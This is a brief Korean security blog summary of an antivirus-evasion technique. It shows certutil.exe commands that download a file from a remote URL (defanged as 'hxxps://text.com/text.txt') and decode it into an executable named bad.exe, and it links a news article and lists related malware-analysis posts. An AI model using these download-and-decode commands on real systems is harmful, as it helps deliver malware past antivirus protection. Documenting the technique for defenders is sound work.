로딩
요청 처리 중입니다...

CertUtil.exe을 이용한 백신 우회

CertUtil.exe을 이용한 백신 우회

원격 URL을 통해 파일을 로컬로 저장가능 certutil.exe -urlcache -split -f [URL] output.file C:\Temp>certutil.exe -urlcache -split -f "hxxps://text.com/text.txt" bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/...

CertUtil.exe을 이용한 백신 우회에 대한 요약내용입니다.

자세한 내용은 아래에 원문링크를 확인해주시기 바랍니다.

원문 링크 : CertUtil.exe을 이용한 백신 우회

등록된 다른 글

161025_랜섬웨어( 확장자: .THOR) 간단분석자료
161025_랜섬웨어( 확장자: .THOR) 간단분석자료
161104_이메일로온 악성코드 스크립트
161104_이메일로온 악성코드 스크립트
180201_doc 매크로 악성코드
180201_doc 매크로 악성코드
180917_EPS 취약점을 이용한 악성코드 [2018년도 국정감사계획서-수정(안).hwp] 분석
180917_EPS 취약점을 이용한 악성코드 [2018년도 국정감사계획서-수정(안).hwp] 분석
181003_한글lnk악성코드 분석(기존 분석 샘플_정리버전)
181003_한글lnk악성코드 분석(기존 분석 샘플_정리버전)
190823_EXE파괴 악성코드(EXE암호화, 레지스트리수정)
190823_EXE파괴 악성코드(EXE암호화, 레지스트리수정)